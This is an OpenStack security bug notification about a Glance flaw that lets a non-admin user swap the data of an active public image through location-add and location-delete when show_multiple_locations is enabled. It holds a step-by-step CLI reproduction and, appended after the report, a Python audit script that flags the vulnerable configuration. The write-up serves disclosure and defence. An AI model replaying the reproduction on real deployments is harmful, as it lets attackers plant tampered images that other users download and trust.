[Openstack-security] [Bug 1549483] Re: Normal user can replace active image data if show_multiple_locations has been set to true
Jeremy Stanley
fungi at yuggoth.org
Thu Feb 9 14:34:52 UTC 2017
** Tags added: security
--
You received this bug notification because you are a member of OpenStack
Security, which is subscribed to OpenStack.
https://bugs.launchpad.net/bugs/1549483
Title:
Normal user can replace active image data if show_multiple_locations
has been set to true
Status in Glance:
Confirmed
Status in OpenStack Security Advisory:
Opinion
Status in OpenStack Security Notes:
Fix Released
Bug description:
Some time ago there was a security bug
https://bugs.launchpad.net/glance/+bug/1525915 and a patch was
proposed and merged in the Glance repo. Unfortunately, it partially fixed
the problem and the issue with immutability still exists.
Bug description:
A user (non-admin) can change image data by updating the location for an image when the "show_multiple_locations" config parameter has been set to true. This breaks the immutability of images in Glance and allows a malicious user to replace data after image activation.
mfedosin at wdev:~$ glance image-create --name good --disk-format qcow2 --container-format bare --visibility public
+------------------+--------------------------------------+
| Property | Value |
+------------------+--------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| size | None |
| status | queued |
| tags | [] |
| updated_at | 2015-11-10T18:41:53Z |
| virtual_size | None |
| visibility | public |
+------------------+--------------------------------------+
mfedosin at wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:21Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
mfedosin at wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin at wdev:~$ cat ooo
I'm really good image.
mfedosin at wdev:~$ glance location-add 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/bad.txt'
+------------------+----------------------------------------------------------------------------------+
| Property | Value |
+------------------+----------------------------------------------------------------------------------+
| checksum | None |
| container_format | bare |
| created_at | 2015-11-10T18:41:53Z |
| disk_format | qcow2 |
| file | /v2/images/2a745d21-66b7-43e0-90b5-ebe62232f7d6/file |
| id | 2a745d21-66b7-43e0-90b5-ebe62232f7d6 |
| locations | [{"url": "https://dl.dropboxusercontent.com/u/13626875/good.txt", "metadata": |
| | {}}, {"url": "https://dl.dropboxusercontent.com/u/13626875/bad.txt", "metadata": |
| | {}}] |
| min_disk | 0 |
| min_ram | 0 |
| name | good |
| owner | f3b42d4b90d840b8806e46fb4a7edca3 |
| protected | False |
| schema | /v2/schemas/image |
| size | 43 |
| status | active |
| tags | [] |
| updated_at | 2015-11-10T18:42:29Z |
| virtual_size | None |
| visibility | public |
+------------------+----------------------------------------------------------------------------------+
mfedosin at wdev:~$ glance location-delete 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --url 'https://dl.dropboxusercontent.com/u/13626875/good.txt'
mfedosin at wdev:~$ glance image-download 2a745d21-66b7-43e0-90b5-ebe62232f7d6 --file ooo
mfedosin at wdev:~$ cat ooo
All your base are belong to us! Muahahaha!
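An added audit script (not part of the bug report or of Glance itself) that flags the deployment configuration the report relies on: show_multiple_locations enabled in glance-api.conf while the set_image_location / delete_image_location policy targets, which gate location-add and location-delete, are not restricted to admins. The config and policy.json contents are constructed samples, and the strings treated as "admin-only" rules are an assumption about a classic policy.json.

```python
import configparser
import json

# Constructed glance-api.conf fragment with the setting the report depends on
# enabled (the Glance default is False).
VULNERABLE_CONF = "[DEFAULT]\nshow_multiple_locations = True\n"

# Constructed policy.json samples. set_image_location / delete_image_location
# are the Glance policy targets behind location-add / location-delete; an empty
# rule lets any authenticated user (so the image owner) pass.
OPEN_POLICY = json.dumps({"context_is_admin": "role:admin", "default": "",
                         "set_image_location": "", "delete_image_location": ""})
HARDENED_POLICY = json.dumps({"context_is_admin": "role:admin", "default": "",
                             "set_image_location": "rule:context_is_admin",
                             "delete_image_location": "rule:context_is_admin"})

LOCATION_TARGETS = ("set_image_location", "delete_image_location")
ADMIN_RULES = ("rule:context_is_admin", "role:admin")  # assumed admin-only spellings


def multiple_locations_enabled(conf_text):
    """True if show_multiple_locations is on in [DEFAULT] of glance-api.conf."""
    cp = configparser.ConfigParser()
    cp.read_string(conf_text)
    return cp.getboolean("DEFAULT", "show_multiple_locations", fallback=False)


def open_location_targets(policy_text):
    """Location targets whose rule is not admin-only. A target missing from
    policy.json falls back to the "default" rule, as oslo.policy does."""
    policy = json.loads(policy_text)
    fallback = policy.get("default", "")
    return [t for t in LOCATION_TARGETS if policy.get(t, fallback) not in ADMIN_RULES]


def audit(conf_text, policy_text):
    """Findings list; empty means owners cannot replace active image data this way."""
    if not multiple_locations_enabled(conf_text):
        return []
    targets = open_location_targets(policy_text)
    if not targets:
        return []
    return ["show_multiple_locations=True and non-admin rule for: " + ", ".join(targets)]


if __name__ == "__main__":
    print(audit(VULNERABLE_CONF, OPEN_POLICY))      # one finding
    print(audit(VULNERABLE_CONF, HARDENED_POLICY))  # []
```

Point the two functions at the real /etc/glance/glance-api.conf and policy.json to check a deployment; either setting show_multiple_locations back to False or making both targets admin-only clears the finding.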